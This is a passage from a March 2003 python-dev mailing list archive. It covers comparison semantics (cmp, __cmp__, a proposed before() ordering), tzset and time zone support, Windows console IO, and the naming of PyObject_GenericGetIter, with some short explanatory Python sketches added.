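        if isinstance(other, Day):
            return self._cmp(other) == 0
        return NotImplemented

    def __le__(self, other):
        if isinstance(other, Day):
            return self._cmp(other) <= 0
        return NotImplemented


def ordering_raises(left, right):
    """Return True if `left <= right` raises TypeError."""
    try:
        left <= right
    except TypeError:
        return True
    return False
```

With both operands declining the comparison, == falls back to identity
(so mixed-type equality is simply False), while <= has no fallback and
raises TypeError.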


From tim.one@comcast.net  Sun Mar 16 22:32:15 2003
From: tim.one@comcast.net (Tim Peters)
Date: Sun, 16 Mar 2003 17:32:15 -0500
Subject: [Python-Dev] Re: Re: lists v. tuples
In-Reply-To: <200303162034.h2GKYH415958@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEFAEBAB.tim.one@comcast.net>

[Guido]
> ...
> I wonder, what's the need for cmp()?  My hunch is that the main reason
> for cmp() is that it's specified in various APIs -- e.g. list.sort(),
> or FP hardware.  But don't those APIs usually specify cmp() because
> their designers (mistakenly) believed the three different outcomes
> were easy to compute together and it would simplify the API?

The three possible outcomes from lexicographic comparison are natural to
compute together, though (compare elements left to right until hitting the
first non-equal element compare).  I expect C's designers had string
comparison mostly in mind, and it's natural for lots of search structures to
need to know which of the three outcomes obtains.  For example, probing a
vanilla binary search tree needs to stop when it hits a node with key equal
to the thing searched for, or move left or right when != obtains.

Long int comparison is a variant of lexicographic comparison, and this
problem shows up repeatedly in a multitude of guises:  you have positive long
ints x and y, and want to find the long int q closest to x/y.

    q, r = divmod(x, y)
    # round nearest/even
    if 2*r > y or (q & 1 and 2*r == y):
        q += 1

is more expensive than necessary when the "q & 1 and 2*r == y" part holds:
the "2*r > y" part had to compare 2*r to y all the way to the end to deduce
that > wasn't the answer, and then you do it all over again to deduce that
equality is the right answer.

    q, r = divmod(x, y)
    c = cmp(2*r, y)
    if c > 0 or (q & 1 and c == 0):
        q += 1

is faster, and Python's long_compare() doesn't do any more work than is
really needed by this algorithm.

So sometimes cmp() is exactly what you want.  OTOH, if Python never had it,
the efficiency gains in such cases probably aren't common enough that a
compelling case for adding it could have been made.
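
For readers on Python 3, where the cmp() builtin no longer exists, the
rounding idea can be sketched like this.  The helper names are
assumptions, and the sketch compares twice the remainder against the
divisor y, which is what round-to-nearest requires.  Note that this
pure-Python cmp() performs two comparisons itself, so it shows the
logic only, not the efficiency gain of a native three-way compare:

```python
def cmp(a, b):
    """Three-way compare: -1, 0, or 1 (stand-in for the old builtin)."""
    return (a > b) - (a < b)


def div_round_half_even(x, y):
    """Return the integer closest to x/y for positive ints, ties to even."""
    q, r = divmod(x, y)
    c = cmp(2 * r, y)          # one three-way result, used twice below
    if c > 0 or (c == 0 and q & 1):
        q += 1
    return q
```

For example, 7/2 and 5/2 are both exact ties, and they round to the
even neighbours 4 and 2 respectively.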


From drifty@alum.berkeley.edu  Sun Mar 16 23:25:15 2003
From: drifty@alum.berkeley.edu (Brett Cannon)
Date: Sun, 16 Mar 2003 15:25:15 -0800 (PST)
Subject: [Python-Dev] tzset
In-Reply-To: <LNBBLJKPBEHFEDALKOLCOEEDEBAB.tim.one@comcast.net>
References: <LNBBLJKPBEHFEDALKOLCOEEDEBAB.tim.one@comcast.net>
Message-ID: <Pine.SOL.4.53.0303161522110.26437@death.OCF.Berkeley.EDU>

[Tim Peters]

> The cross-platform semantics of TZ are a joke.  The tests we have rely on
> non-standard extensions (viewing POSIX as the only definitive std here).
> Even if they stuffed colons at the front, POSIX leaves the interpretation of
> colon-initiated TZ values entirely up to the implementation:
>
>     If TZ is of the first format (that is, if the first character is a
>     colon), the characters following the colon are handled in an
>     implementation-defined manner.
>
> Worse, if the platform tzset() isn't happy with TZ's value, it has no way to
> tell you:  the function is declared void, and has no defined effects on
> errno.
>

If this thing is so broken, why are we bothering with it?  It's one thing
to want to give people access to facilities that do something useful; it's
another thing entirely to give them access to something that is broken.

Perhaps if we are going to bother to make this available the work should
be done to make it have more standard output?  So take whatever the C
function returns and then make it conform to some reasonable output.

-Brett


From greg@cosc.canterbury.ac.nz  Sun Mar 16 23:45:40 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Mon, 17 Mar 2003 11:45:40 +1200 (NZST)
Subject: [Python-Dev] Re: lists v. tuples
In-Reply-To: <200303150857.53214.aleax@aleax.it>
Message-ID: <200303162345.h2GNjeH03921@oma.cosc.canterbury.ac.nz>

Alex Martelli <aleax@aleax.it>:

> So, lists whose elements have LESS in common (by being of
> widely different types) are more likely to be sortable than lists
> some of whose elements have in common the fact of being
> numbers (if one or more of those numbers are complex).

As I think I've mentioned before, Python really needs
two different kinds of comparison: one which does whatever
makes sense for objects of compatible types (and which
need not be supported by all types), and another which
imposes an arbitrary order on all objects.

When sorting a list, you would have to specify which
kind of ordering you wanted.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From greg@cosc.canterbury.ac.nz  Sun Mar 16 23:54:54 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Mon, 17 Mar 2003 11:54:54 +1200 (NZST)
Subject: [Python-Dev] Re: Re: lists v. tuples
In-Reply-To: <200303152245.h2FMjZx06571@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <200303162354.h2GNssR04071@oma.cosc.canterbury.ac.nz>

Guido:

> And I'm still hoping to remove __cmp__; there should be only one
> way to overload comparisons.

I'd rather you kept it and re-defined it to mean
"compare for arbitrary ordering". (Maybe change its
name if there are backwards-compatibility issues.)

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From greg@cosc.canterbury.ac.nz  Mon Mar 17 00:37:20 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Mon, 17 Mar 2003 12:37:20 +1200 (NZST)
Subject: [Python-Dev] Re: Re: lists v. tuples
In-Reply-To: <200303162034.h2GKYH415958@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <200303170037.h2H0bKf04632@oma.cosc.canterbury.ac.nz>

Guido:

> But don't those APIs usually specify cmp() because
> their designers (mistakenly) believed the three different outcomes
> were easy to compute together and it would simplify the API?

I reckon it all goes back to Fortran with its
IF (X) 10,20,30 statement.

Maybe the first Fortran machine had a 3-way
jump instruction?

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From guido@python.org  Mon Mar 17 01:43:33 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 16 Mar 2003 20:43:33 -0500
Subject: [Python-Dev] tzset
In-Reply-To: "Your message of Sun, 16 Mar 2003 15:25:15 PST."
 <Pine.SOL.4.53.0303161522110.26437@death.OCF.Berkeley.EDU>
References: <LNBBLJKPBEHFEDALKOLCOEEDEBAB.tim.one@comcast.net>
 <Pine.SOL.4.53.0303161522110.26437@death.OCF.Berkeley.EDU>
Message-ID: <200303170143.h2H1hXH16557@pcp02138704pcs.reston01.va.comcast.net>

> If this thing is so broken, why are we bothering with it?  It's one thing
> to want to give people access to facilities that do something useful; it's
> another thing entirely to give them access to something that is broken.
> 
> Perhaps if we are going to bother to make this available the work should
> be done to make it have more standard output?  So take whatever the C
> function returns and then make it conform to some reasonable output.

I look at it differently.  It's useful to make the platform tzset()
available, because it lets us do something that couldn't be done
before: change the definition of local time without restarting Python.
If tzset() doesn't take standardized arguments, that's the problem of
whoever wants to use it.  There are lots of functions that have this:
for example, anything taking a filename.  At least it's there.
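
A minimal sketch of that use, assuming a Unix-like platform where
time.tzset() is available.  The local_hour() helper is hypothetical,
and the TZ string is handed to the C library unvalidated, which is
exactly the caveat discussed in this thread:

```python
import os
import time


def local_hour(timestamp, tz_value):
    """Return the local hour of `timestamp` under the given TZ setting.

    Assumes time.tzset() exists (Unix); `tz_value` is passed to the
    platform as-is, so a bad value is silently accepted or ignored.
    """
    previous = os.environ.get("TZ")
    os.environ["TZ"] = tz_value
    time.tzset()
    try:
        return time.localtime(timestamp).tm_hour
    finally:
        # Restore the earlier setting so the change does not leak.
        if previous is None:
            del os.environ["TZ"]
        else:
            os.environ["TZ"] = previous
        time.tzset()
```

Calling local_hour(0, "UTC0") and then local_hour(0, "XYZ-3") in the
same process shows local time being redefined without a restart; both
strings use the plain POSIX "std offset" form rather than a
colon-prefixed, implementation-defined value.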

The test suite for tzset() probably is too strict; we'll tune it to
avoid failures on common platforms during the beta cycle.

I don't know if it makes sense to provide tzset() on Windows; from
Tim's description it doesn't sound likely.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Mon Mar 17 01:50:40 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 16 Mar 2003 20:50:40 -0500
Subject: [Python-Dev] Re: Re: lists v. tuples
In-Reply-To: "Your message of Mon, 17 Mar 2003 11:54:54 +1200."
 <200303162354.h2GNssR04071@oma.cosc.canterbury.ac.nz>
References: <200303162354.h2GNssR04071@oma.cosc.canterbury.ac.nz>
Message-ID: <200303170150.h2H1of116581@pcp02138704pcs.reston01.va.comcast.net>

> Guido:
> > And I'm still hoping to remove __cmp__; there should be only one
> > way to overload comparisons.

[Greg]
> I'd rather you kept it and re-defined it to mean
> "compare for arbitrary ordering". (Maybe change its
> name if there are backwards-compatibility issues.)

Hm, that's not what it does now, and an arbitrary ordering is better
defined by a "less" style operator.

I've been thinking of __before__ and a built-in before(x, y) -> bool.
(Not __less__ / less, because IMO that's too close to __lt__ / <.)

BTW, there are two possible uses for before(): it could be used to
impose an arbitrary ordering for types that don't have one now (like
complex); and it could be used to impose an ordering between different
types (like numbers and strings).  I've got a gut feeling that the
requirements for these are somewhat different, but can't quite
pinpoint it.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@comcast.net  Mon Mar 17 02:17:23 2003
From: tim.one@comcast.net (Tim Peters)
Date: Sun, 16 Mar 2003 21:17:23 -0500
Subject: [Python-Dev] tzset
In-Reply-To: <200303170143.h2H1hXH16557@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEFMEBAB.tim.one@comcast.net>

[Guido]
> ...
> I don't know if it makes sense to provide tzset() on Windows; from
> Tim's description it doesn't sound likely.

I wouldn't object if someone else wanted to do the work (which includes
documenting it well enough to cut off an endless stream of obvious
questions).  The Windows tzset is weak but maybe usable for some people.
For example, time zone names must be exactly 3 characters, and you can't
tell the Windows tzset when daylight time begins or ends:  it uses US rules
no matter what the time zone.  The native Win32 SetTimeZoneInformation()
doesn't suffer these idiocies, but I'm not sure whether calling that affects
the Unixish _tzname (etc) variables.  "Doing the work" also means figuring
out all that stuff.


From zen@shangri-la.dropbear.id.au  Mon Mar 17 03:51:42 2003
From: zen@shangri-la.dropbear.id.au (Stuart Bishop)
Date: Mon, 17 Mar 2003 14:51:42 +1100
Subject: [Python-Dev] tzset
In-Reply-To: <LNBBLJKPBEHFEDALKOLCOEEDEBAB.tim.one@comcast.net>
Message-ID: <C3ED652A-582B-11D7-9648-000393B63DDC@shangri-la.dropbear.id.au>

On Sunday, March 16, 2003, at 04:07  PM, Tim Peters wrote:

> Worse, if the platform tzset() isn't happy with TZ's value, it has no way to
> tell you:  the function is declared void, and has no defined effects on
> errno.

Yup. It sucks, but is the best there is. I can't even find proprietary
solutions for various Unix flavours. Maybe a post to Slashdot saying
Zope 3 will be Windows only due to limitations in POSIX would at least
get something for the free distros :-)

> I hope the community takes up the challenge of building a sane
> cross-platform time zone facility building on 2.3 datetime's tzinfo objects.

A cross-platform time zone facility isn't a problem - the data we need is
available and maintained as part of numerous free Unix distributions. We
could even steal C code to decode it if we are particularly lazy.

The trick is that countries' timezone changes don't follow the
Python release schedule, and I think this was covered in depth on python-dev
not long ago in excruciating detail that I'm sure no one wants to repeat :-)

So the actual problem would be how to distribute data file updates to Python
installations, which would also mean we could support the various ISO
standards relating to things like country codes and languages (which I'm
sure many of us are currently doing manually).

Possibly a script that could be run as the
user-who-owns-the-python-installation to update from SourceForge, with
python-announce as the notification channel when files are updated?

-- 
Stuart Bishop <zen@shangri-la.dropbear.id.au>
http://shangri-la.dropbear.id.au/


From aleax@aleax.it  Mon Mar 17 07:25:48 2003
From: aleax@aleax.it (Alex Martelli)
Date: Mon, 17 Mar 2003 08:25:48 +0100
Subject: [Python-Dev] Re: Re: lists v. tuples
In-Reply-To: <200303170150.h2H1of116581@pcp02138704pcs.reston01.va.comcast.net>
References: <200303162354.h2GNssR04071@oma.cosc.canterbury.ac.nz> <200303170150.h2H1of116581@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <200303170825.48556.aleax@aleax.it>

On Monday 17 March 2003 02:50 am, Guido van Rossum wrote:
> > Guido:
> > > And I'm still hoping to remove __cmp__; there should be only one
> > > way to overload comparisons.
>
> [Greg]
>
> > I'd rather you kept it and re-defined it to mean
> > "compare for arbitrary ordering". (Maybe change its
> > name if there are backwards-compatibility issues.)
>
> Hm, that's not what it does now, and an arbitrary ordering is better
> defined by a "less" style operator.

+1.  I entirely agree that any ordering is easier to define with a
2-way comparison with the usual constraints of ordering, i.e.,
for any x, y, 
    before(x,x) is false, 
    before(x,y) implies not before(y,x), 
    before(x,y) and before(y,z) implies before(x,z)
and for this specific purpose of arbitrary ordering, it would, I think,
be necessary for 'before' to define a total ordering, i.e. the implied
equivalence being equality, i.e.
    not before(x,y) and not before(y,x) imply x==y
(This latter desideratum may be a source of problems, see below).

It would also be very nice if before(x,y) were the same as x<y
whenever the latter doesn't raise an exception, if feasible.


> I've been thinking of __before__ and a built-in before(x, y) -> bool.
> (Not __less__ / less, because IMO that's too close to __lt__ / <.)

I love the name 'before' and I entirely concur with your decision
to avoid the name 'less'.

> BTW, there are two possible uses for before(): it could be used to
> impose an arbitrary ordering for types that don't have one now (like
> complex); and it could be used to impose an ordering between different
> types (like numbers and strings).  I've got a gut feeling that the
> requirements for these are somewhat different, but can't quite
> pinpoint it.

Perhaps subclassing/subtyping [and other possible cases where
x==y may be true yet type(x) is not type(y)] may be the sticky
issues, when all desirable constraints are considered together.  

The simplest problematic case I can think of is before(1,1+0j) --
by the "respect ==" criterion I would want both this comparison,
and the same one with operands swapped, to be false; but by
the criterion of imposing ordering between different incomparable
types, I would like 'before' to range all instances of 'complex'
"together", either all before, or all after, "normal" (comparable)
numbers (ideally in a way that while arbitrary is repeatable over
different runs/platforms/Python releases -- mostly for ease of
teaching and explaining, rather than as a specific application need).


Alex


From whisper@oz.net  Mon Mar 17 07:57:24 2003
From: whisper@oz.net (David LeBlanc)
Date: Sun, 16 Mar 2003 23:57:24 -0800
Subject: [Python-Dev] Windows IO
Message-ID: <GCEDKONBLEFPPADDJCOEGENBIOAA.whisper@oz.net>

It looks as though IO in Python (2.2.1), regardless of platform or device,
happens in Objects/fileobject.c and, in particular, writing occurs in
file_write(...)?

A few questions I hope a lurking (timbot? ;) ) person can answer:

1. Is the above true, or does something different happen when using a
Windows console/commandline?

2. Is there any way to know if a console is being used (that a device is the
console)?

3. What's the purpose of the PC/msvcrtmodule.c file? Does it play any role
in the regular pythonic IO scheme of things?

I'm interested in discovering if the Win32 API for screen reading/writing
can be used so that character color attributes and cursor commands can be
manipulated. It would be nice if those could be used transparently to a
python application so that an application sending (for instance) ANSI color
codes would succeed and one that didn't wouldn't care. I realize this is
sort of like curses - is there a Windows version of curses that plays well
with Python and isn't GPL?

TIA,

David LeBlanc
Seattle, WA USA


From thomas@xs4all.net  Mon Mar 17 10:57:56 2003
From: thomas@xs4all.net (Thomas Wouters)
Date: Mon, 17 Mar 2003 11:57:56 +0100
Subject: [Python-Dev] Re: [Python-checkins] python/dist/src/Modules _hotshot.c,1.32,1.33 arraymodule.c,2.84,2.85 xreadlinesmodule.c,1.13,1.14
In-Reply-To: <E18uq66-0001H4-00@sc8-pr-cvs1.sourceforge.net>
References: <E18uq66-0001H4-00@sc8-pr-cvs1.sourceforge.net>
Message-ID: <20030317105756.GP2112@xs4all.nl>

On Mon, Mar 17, 2003 at 12:35:54AM -0800, rhettinger@users.sourceforge.net wrote:

> Created PyObject_GenericGetIter().
> Factors out the common case of returning self.

PyObject_GenericGetIter doesn't really describe what it does; I would assume
that it tried to get the iter by assuming obj was a sequence type, and
returned an iter that wraps that. Wouldn't "PyObject_GetSelfIter" or
"PyObject_GenericSelfIter" or "PyObject_SelfIter" be a better name ?

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From mwh@python.net  Mon Mar 17 11:19:38 2003
From: mwh@python.net (Michael Hudson)
Date: Mon, 17 Mar 2003 11:19:38 +0000
Subject: [Python-Dev] PyEval_GetFrame() revisited
In-Reply-To: <20030316073303.31B3E5147@bespin.org> (Armin Rigo's message of
 "Sat, 15 Mar 2003 23:33:03 -0800 (PST)")
References: <3E7204EC.60506@tismer.com> <3E7219D1.6090306@tismer.com>
 <20030316073303.31B3E5147@bespin.org>
Message-ID: <2mhea29r5h.fsf@starship.python.net>

Armin Rigo <arigo@tunes.org> writes:


> Maybe an API to manipulate tstate->frame could be useful and really
> lightweight.  Alternatively, we could consider what pyexpat does as
> a general pattern and have an API for it, e.g.:

Yes please!

Cheers,
M.

-- 
  Our lecture theatre has just crashed. It will currently only
  silently display an unexplained line-drawing of a large dog
  accompanied by spookily flickering lights.
     -- Dan Sheppard, ucam.chat (from Owen Dunn's summary of the year)


From mwh@python.net  Mon Mar 17 11:33:30 2003
From: mwh@python.net (Michael Hudson)
Date: Mon, 17 Mar 2003 11:33:30 +0000
Subject: [Python-Dev] Re: lists v. tuples
In-Reply-To: <3E734DD7.3080105@tismer.com> (Christian Tismer's message of
 "Sat, 15 Mar 2003 16:59:19 +0100")
References: <20030312164902.10494.64514.Mailman@mail.python.org>
 <200303140903.10045.aleax@aleax.it> <3E71F851.3030802@tismer.com>
 <200303150857.53214.aleax@aleax.it> <3E734DD7.3080105@tismer.com>
Message-ID: <2mel569qid.fsf@starship.python.net>

Christian Tismer <tismer@tismer.com> writes:

>  >>> a=[1, 2, 2+2j, 3+1j, 1+3j, 3-3j, 3+1j, 1+3j]
>  >>> a.sort(lambda x, y:cmp(abs(x), abs(y)))
>  >>> a
> [1, 2, (2+2j), (3+1j), (1+3j), (3+1j), (1+3j), (3-3j)]
>  >>>

Ooh, now I get to mention the list.sort feature request I came up with
this weekend <wink>:

I'd like to be able to write the above call as:

>>> a.sort(key=abs)

Cheers,
M.

-- 
112. Computer Science is embarrassed by the computer.
  -- Alan Perlis, http://www.cs.yale.edu/homes/perlis-alan/quotes.html


From mal@lemburg.com  Mon Mar 17 11:34:00 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Mon, 17 Mar 2003 12:34:00 +0100
Subject: [Python-Dev] tzset
In-Reply-To: <C3ED652A-582B-11D7-9648-000393B63DDC@shangri-la.dropbear.id.au>
References: <C3ED652A-582B-11D7-9648-000393B63DDC@shangri-la.dropbear.id.au>
Message-ID: <3E75B2A8.3030102@lemburg.com>

Stuart Bishop wrote:
> On Sunday, March 16, 2003, at 04:07  PM, Tim Peters wrote:
> 
>> Worse, if the platform tzset() isn't happy with TZ's value, it has no 
>> way to tell you:  the function is declared void, and has no defined effects on
>> errno.
> 
> Yup. It sucks, but is the best there is. I can't even find proprietary
> solutions for various Unix flavours. Maybe a post to Slashdot saying
> Zope 3 will be Windows only due to limitations in POSIX would at least
> get something for the free distros :-)

I wonder why we need a TZ-parser then ? If it's non-standard
anyway, the module is probably better off outside the core as
separate download from e.g. SF.

>> I hope the community takes up the challenge of building a sane
>> cross-platform time zone facility building on 2.3 datetime's tzinfo 
>> objects.
> 
> A cross-platform time zone facility isn't a problem - the data we need is
> available and maintained as part of numerous free Unix distributions. We
> could even steal C code to decode it if we are particularly lazy.

-1

Why bloat the Python distribution with yet another locale
implementation ?

-- 
Marc-Andre Lemburg
eGenix.com



From guido@python.org  Mon Mar 17 12:26:24 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 17 Mar 2003 07:26:24 -0500
Subject: [Python-Dev] Who approved PyObject_GenericGetIter()???
In-Reply-To: "Your message of Mon, 17 Mar 2003 00:22:59 PST."
 <E18uptb-0007rb-00@sc8-pr-cvs1.sourceforge.net>
References: <E18uptb-0007rb-00@sc8-pr-cvs1.sourceforge.net>
Message-ID: <200303171226.h2HCQOS17719@pcp02138704pcs.reston01.va.comcast.net>

> Modified Files:
> 	object.c 
> Log Message:
> Created PyObject_GenericGetIter().
> Factors out the common case of returning self.
> 
> 
> 
> Index: object.c
> ===================================================================
> RCS file: /cvsroot/python/python/dist/src/Objects/object.c,v
> retrieving revision 2.199
> retrieving revision 2.200
> diff -C2 -d -r2.199 -r2.200
> *** object.c	19 Feb 2003 03:19:29 -0000	2.199
> --- object.c	17 Mar 2003 08:22:56 -0000	2.200
> ***************
> *** 1302,1305 ****
> --- 1302,1312 ----
>   
>   PyObject *
> + PyObject_GenericGetIter(PyObject *obj)
> + {
> + 	Py_INCREF(obj);
> + 	return obj;
> + }
> + 
> + PyObject *
>   PyObject_GenericGetAttr(PyObject *obj, PyObject *name)
>   {

Huh?  Where was this agreed upon?  __iter__ returning self doesn't
sound very generic to me, so at the very least the name should be
changed IMO.  Also, adding a standard API for a helper function this
trivial doesn't really make sense to me.

So maybe I'm missing something.  Please explain.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Mon Mar 17 12:35:23 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 17 Mar 2003 07:35:23 -0500
Subject: [Python-Dev] tzset
In-Reply-To: "Your message of Mon, 17 Mar 2003 12:34:00 +0100."
 <3E75B2A8.3030102@lemburg.com>
References: <C3ED652A-582B-11D7-9648-000393B63DDC@shangri-la.dropbear.id.au>
 <3E75B2A8.3030102@lemburg.com>
Message-ID: <200303171235.h2HCZNC17807@pcp02138704pcs.reston01.va.comcast.net>

> > A cross-platform time zone facility isn't a problem - the data we need is
> > available and maintained as part of numerous free Unix distributions. We
> > could even steal C code to decode it if we are particularly lazy.
> 
> -1
> 
> Why bloat the Python distribution with yet another locale
> implementation ?

Agreed.  This should be a 3rd party add-on.  (Especially since in many
cases, tzset() does all you need.)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mchermside@ingdirect.com  Mon Mar 17 13:50:22 2003
From: mchermside@ingdirect.com (Chermside, Michael)
Date: Mon, 17 Mar 2003 08:50:22 -0500
Subject: [Python-Dev] Re: lists v. tuples
Message-ID: <7F171EB5E155544CAC4035F0182093F04211EF@INGDEXCHSANC1.ingdirect.com>

[Christian Tismer]
> that people are putting widely different types into
> a list in order to sort them. (Although there is an
> arbitrary order between strings and numbers, which
> I would drop in Python 2.4, too).

[Alex Martelli]
> Such a change would indeed enormously increase the
> number of non-sortable (except by providing custom
> compares) lists.  So, for example, all places which get
> and sort the list of keys in a dictionary in order to return
> or display the keys should presumably do the sorting
> within a try/except?
        [...]
> Or do you think a dictionary should also be constrained to have keys
> that are all comparable with each other (i.e., presumably, never
> both string AND number keys) as well as hashable?

[Guido van Rossum]
> I don't believe this argument.  I've indeed often sorted a dict's keys
> (or values), but always in situations where the sorted values were
> homogeneous as far as meaningful comparison goes, e.g. all numbers, or
> all strings, or all "compatible" tuples.
>
> If you know *nothing* about the keys of a dict, you already have to do
>
>=20
> There are lots of apps that have no need to ever sort the keys: if
> there weren't, it would have been wiser to keep the keys in sorted
> order in the first place, like ABC did.

Actually, I found Alex's example to be quite persuasive. I had
been reading this thread and thinking how I essentially never
create and sort lists containing mixed arbitrary objects. But I
DO use dicts, and while most of my dicts have string-only keys,
there are others that don't.

I wouldn't want to maintain the keys in sorted order, because I
don't have to sort my dictionaries (at least the ones that have
mixed arbitrary objects for keys), *EXCEPT* that I *DO* sort them
when I'm debugging! It's a pain (as I'm sure you know) to examine
two dicts in a logfile or debug session and find how they differ,
a task made much easier by sorting the keys before listing.

So Alex convinced me that I *DO* have a use-case for sorting
arbitrary things after all... in code (like my dict prettifier)
used for coding and debugging. And if I ever used complex numbers
in my lists, I'd already be in trouble... but somehow it's never
come up. (I guess complex #s as keys are unusual ;-).)

I think the lesson is that we shouldn't break arbitrary object
comparison (more than it's already broken) until AFTER Guido's
OTHER proposal (the "before()" comparison) is in place to be used
in this sort of situation. I wouldn't mind switching over to a
slightly different syntax as long as I don't have to write a
custom sort routine each and every time I want to print a dict
to the logs.
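
A sketch of the kind of debugging helper described here, written for
Python 3 (where mixed-type comparison raises TypeError).  The function
name and the fallback key of (type name, repr) are assumptions; the
fallback order is arbitrary but repeatable, not meaningful:

```python
def sorted_items(mapping):
    """Return (key, value) pairs in a stable, printable order.

    Tries the keys' natural ordering first; if the keys are not
    mutually comparable, falls back to ordering by type name and repr.
    """
    try:
        return sorted(mapping.items(), key=lambda item: item[0])
    except TypeError:
        return sorted(
            mapping.items(),
            key=lambda item: (type(item[0]).__name__, repr(item[0])),
        )
```

Two dicts printed through this helper list their keys in the same
order, which makes differences easier to spot in a log, even when the
keys mix strings, numbers, or complex values.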

[Guido van Rossum]
> I'm sure that raising an exception on abominations like 2 < "1" or
> (1, 2) < 0 is a good thing, just like we all agree that forbidding
> 1 + "2" is a good thing.

I agree with you there!

-- Michael Chermside


From python@rcn.com  Mon Mar 17 14:02:02 2003
From: python@rcn.com (Raymond Hettinger)
Date: Mon, 17 Mar 2003 09:02:02 -0500
Subject: [Python-Dev] PyObject_GenericGetIter()
References: <E18uptb-0007rb-00@sc8-pr-cvs1.sourceforge.net> <200303171226.h2HCQOS17719@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <005801c2ec8d$c8fd9100$125ffea9@oemcomputer>

> Where was this agreed upon?  

Perhaps I overstepped.  It's been on my todo list for a 
couple of months and didn't seem to be even slightly
controversial.


> __iter__ returning self doesn't sound very generic to me, 
> so at the very least the name should be changed IMO.  

Thomas suggested PyObject_GetSelfIter, PyObject_GenericSelfIter,
or PyObject_SelfIter.  Consistent with the other tp_slot fillers, I 
suggest PyObject_GenericIter. 


> Also, adding a standard API for a helper function this
> trivial doesn't really make sense to me.

This identical code was duplicated in a dozen different
modules in the same context.  It comes up when writing
most iterators and needed to be factored out.
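
For comparison, the same pattern at the Python level: an iterator's
__iter__ conventionally returns the iterator itself.  The Countdown
class is a made-up example, not code from any of the modules involved:

```python
class Countdown:
    """Hypothetical iterator counting down from `start` to 1."""

    def __init__(self, start):
        self.current = start

    def __iter__(self):
        # The "return self" case that the C helper factors out.
        return self

    def __next__(self):
        if self.current <= 0:
            raise StopIteration
        value = self.current
        self.current -= 1
        return value
```

Because iter() on such an object hands back the same object, it can be
used directly in a for loop or passed to list().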


Raymond Hettinger


From python@rcn.com  Mon Mar 17 14:41:01 2003
From: python@rcn.com (Raymond Hettinger)
Date: Mon, 17 Mar 2003 09:41:01 -0500
Subject: [Python-Dev] PyObject_GenericGetIter()
References: <E18uptb-0007rb-00@sc8-pr-cvs1.sourceforge.net> <200303171226.h2HCQOS17719@pcp02138704pcs.reston01.va.comcast.net> <005801c2ec8d$c8fd9100$125ffea9@oemcomputer>
Message-ID: <001e01c2ec93$3bcc7d40$125ffea9@oemcomputer>

> > __iter__ returning self doesn't sound very generic to me, 
> > so at the very least the name should be changed IMO.  
> 
> Thomas suggested PyObject_GetSelfIter, PyObject_GenericSelfIter,
> or PyObject_SelfIter.  Consistent with the other tp_slot fillers, I 
> suggest PyObject_GenericIter. 

A couple of other thoughts.  While Thomas found the "getiter" part
of the name to be unintuitive, the type of the slot is named (getiterfunc)
and most of the replaced functions had names like dictiter_getiter, 
enum_getiter, iter_getiter, listiter_getiter, xreadlines_getiter ...
So, my first preference is the name in the subject line.


Raymond Hettinger


From mchermside@ingdirect.com  Mon Mar 17 14:59:33 2003
From: mchermside@ingdirect.com (Chermside, Michael)
Date: Mon, 17 Mar 2003 09:59:33 -0500
Subject: [Python-Dev] Re: lists v. tuples
Message-ID: <7F171EB5E155544CAC4035F0182093F03CF7A5@INGDEXCHSANC1.ingdirect.com>

[Glyph Lefkowitz]
> This smells like another unformed PEP I don't have the time to think
> about or implement :-(, but I would definitely like to see mutability
> guarantees worm their way into the language at some point, too.

Hmm... as far as I can tell, this would be a fairly trivial change.
All we'd need to do is make a slight modification (just adding one
method to each) to ints, strings, and tuples (and perhaps a couple of
others) and you'd have your guarantee!

Of-course-guaranteeing-that-everything-is-mutable-might-not-be-what-you-expected

-- Michael Chermside


From thomas@xs4all.net  Mon Mar 17 15:10:40 2003
From: thomas@xs4all.net (Thomas Wouters)
Date: Mon, 17 Mar 2003 16:10:40 +0100
Subject: [Python-Dev] PyObject_GenericGetIter()
In-Reply-To: <001e01c2ec93$3bcc7d40$125ffea9@oemcomputer>
References: <E18uptb-0007rb-00@sc8-pr-cvs1.sourceforge.net> <200303171226.h2HCQOS17719@pcp02138704pcs.reston01.va.comcast.net> <005801c2ec8d$c8fd9100$125ffea9@oemcomputer> <001e01c2ec93$3bcc7d40$125ffea9@oemcomputer>
Message-ID: <20030317151040.GQ2112@xs4all.nl>

On Mon, Mar 17, 2003 at 09:41:01AM -0500, Raymond Hettinger wrote:

> > Thomas suggested PyObject_GetSelfIter, PyObject_GenericSelfIter,
> > or PyObject_SelfIter.  Consistent with the other tp_slot fillers, I 
> > suggest PyObject_GenericIter. 

> A couple of other thoughts.  While Thomas found the "getiter" part
> of the name to be unintuitive, the type of the slot is named (getiterfunc)
> and most of the replaced functions had names like dictiter_getiter, 
